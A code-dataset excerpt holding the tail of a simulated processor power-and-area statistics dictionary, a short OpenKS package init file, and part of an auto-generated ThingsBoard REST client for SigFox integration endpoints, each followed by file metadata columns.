'Execution Unit/Integer ALUs/Runtime Dynamic': 0.375345,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.14672,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0778636,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0123185,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.11763,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0911031,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.195494,
'Execution Unit/Register Files/Runtime Dynamic': 0.103422,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.305142,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.768031,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.311,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00177035,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00177035,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00154852,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000603035,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0013087,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00639793,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0167402,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0875797,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.57082,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.212439,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.29746,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.06384,
'Instruction Fetch Unit/Runtime Dynamic': 0.620617,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0441599,
'L2/Runtime Dynamic': 0.00944066,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.88003,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.75061,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117857,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117857,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.43884,
'Load Store Unit/Runtime Dynamic': 2.44969,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.290615,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.58123,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.10314,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.103803,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.346373,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0348163,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.683182,
'Memory Management Unit/Runtime Dynamic': 0.138619,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.9384,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.271649,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.020645,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.172697,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.464991,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.99436,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.022871199952331348,
'Runtime Dynamic': 0.022871199952331348,
'Subthreshold Leakage': 8.504,
'Subthreshold Leakage with power gating': 8.504},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.026291,
'Runtime Dynamic': 0.0159925,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364},
{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.0256158,
'Runtime Dynamic': 0.0152321,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 388.384,
'Gate Leakage': 3.09074,
'Peak Dynamic': 199.133,
'Peak Power': 265.679,
'Runtime Dynamic': 55.679,
'Subthreshold Leakage': 63.4555,
'Subthreshold Leakage with power gating': 28.0572,
'Total Cores/Area': 260.865,
'Total Cores/Gate Leakage': 2.98397,
'Total Cores/Peak Dynamic': 198.864,
'Total Cores/Runtime Dynamic': 55.6196,
'Total Cores/Subthreshold Leakage': 49.7502,
'Total Cores/Subthreshold Leakage with power gating': 20.6649,
'Total L3s/Area': 123.815,
'Total L3s/Gate Leakage': 0.0968273,
'Total L3s/Peak Dynamic': 0.0519068,
'Total L3s/Runtime Dynamic': 0.0312246,
'Total L3s/Subthreshold Leakage': 13.6017,
'Total L3s/Subthreshold Leakage with power gating': 6.64728,
'Total Leakage': 66.5462,
'Total NoCs/Area': 3.70399,
'Total NoCs/Gate Leakage': 0.00993673,
'Total NoCs/Peak Dynamic': 0.216542,
'Total NoCs/Runtime Dynamic': 0.0281445,
'Total NoCs/Subthreshold Leakage': 0.103619,
'Total NoCs/Subthreshold Leakage with power gating': 0.0388573}} | 75.692825 | 124 | 0.684136 | 15,928 | 135,036 | 5.794011 | 0.044576 | 0.122292 | 0.114426 | 0.094661 | 0.961143 | 0.959669 | 0.951174 | 0.925851 | 0.910161 | 0.904439 | 0 | 0.130598 | 0.222755 | 135,036 | 1,784 | 125 | 75.692825 | 0.748695 | 0 | 0 | 0.723094 | 0 | 0 | 0.660811 | 0.048875 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
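A minimal sketch (editor's illustration, not part of the dataset row above) of how the flattened 'Unit/Sub-unit/Metric' keys in the per-core power dictionaries could be read back. Only the 'DRAM', 'L3' and 'Processor' keys are visible in this excerpt; the name of the per-core list ('Core' below) and the variable power_stats are assumptions.

def unit_runtime_dynamic(core_stats):
    # Keep only unit-level totals such as 'Execution Unit/Runtime Dynamic',
    # skipping deeper entries like 'Execution Unit/Complex ALUs/Runtime Dynamic'
    # so that sub-components are not double counted.
    return {key.split('/')[0]: value
            for key, value in core_stats.items()
            if key.endswith('/Runtime Dynamic') and key.count('/') == 1}

# Hypothetical usage, assuming power_stats holds the full dictionary shown above:
# for index, core in enumerate(power_stats.get('Core', [])):
#     print(index, unit_runtime_dynamic(core))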
92213088c2ff56c7d8ae6f9ffd14590d7ceda74e | 120 | py | Python | openks/models/pytorch/ke_modules/nero_modules/__init__.py | zhengkangjie/OpenKS | 4e010c3d3cc6acec3968fd92e21a473e02e76f70 | [
"Apache-2.0"
] | 1 | 2021-03-12T02:41:05.000Z | 2021-03-12T02:41:05.000Z | openks/models/pytorch/ke_modules/nero_modules/__init__.py | zhengkangjie/OpenKS | 4e010c3d3cc6acec3968fd92e21a473e02e76f70 | [
"Apache-2.0"
] | null | null | null | openks/models/pytorch/ke_modules/nero_modules/__init__.py | zhengkangjie/OpenKS | 4e010c3d3cc6acec3968fd92e21a473e02e76f70 | [
"Apache-2.0"
] | 1 | 2021-02-08T11:08:26.000Z | 2021-02-08T11:08:26.000Z | from .main import *
from .models.soft_match_bert import *
from .models.pat_match import *
from . import semeval_constant | 30 | 37 | 0.8 | 18 | 120 | 5.111111 | 0.555556 | 0.326087 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 120 | 4 | 38 | 30 | 0.87619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9230e5b177de103567c3aea96cef7fe8ece15cbd | 34,977 | py | Python | tb_rest_client/api/api_pe/sig_fox_integration_controller_api.py | maksonlee/python_tb_rest_client | a6cd17ef4de31f68c3226b7a9835292fbac4b1fa | [
"Apache-2.0"
] | 1 | 2021-07-19T10:09:04.000Z | 2021-07-19T10:09:04.000Z | tb_rest_client/api/api_pe/sig_fox_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | tb_rest_client/api/api_pe/sig_fox_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class SigFoxIntegrationControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def process_request_using_delete1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_delete1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_delete1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
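    # Illustrative usage sketch added by the editor (not part of the generated client);
    # the routing key, payload and header values below are hypothetical placeholders,
    # while the call pattern follows the docstring above.
    #
    # >>> client = ApiClient()
    # >>> api = SigFoxIntegrationControllerApi(api_client=client)
    # >>> # synchronous call, returns a DeferredResultResponseEntity
    # >>> result = api.process_request_using_delete1('my-routing-key', '{"data": "0102"}', {})
    # >>> # asynchronous call, returns a thread; .get() yields the same response type
    # >>> thread = api.process_request_using_delete1('my-routing-key', '{"data": "0102"}', {}, async_req=True)
    # >>> result = thread.get()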
def process_request_using_delete1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_delete1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_delete1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_delete1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_get1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_get1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_get1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_get1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_get1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_get1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_get1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_head1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_head1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_head1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_head1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_head1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_head1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_head1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_options1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_options1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_options1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_options1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_options1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_options1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
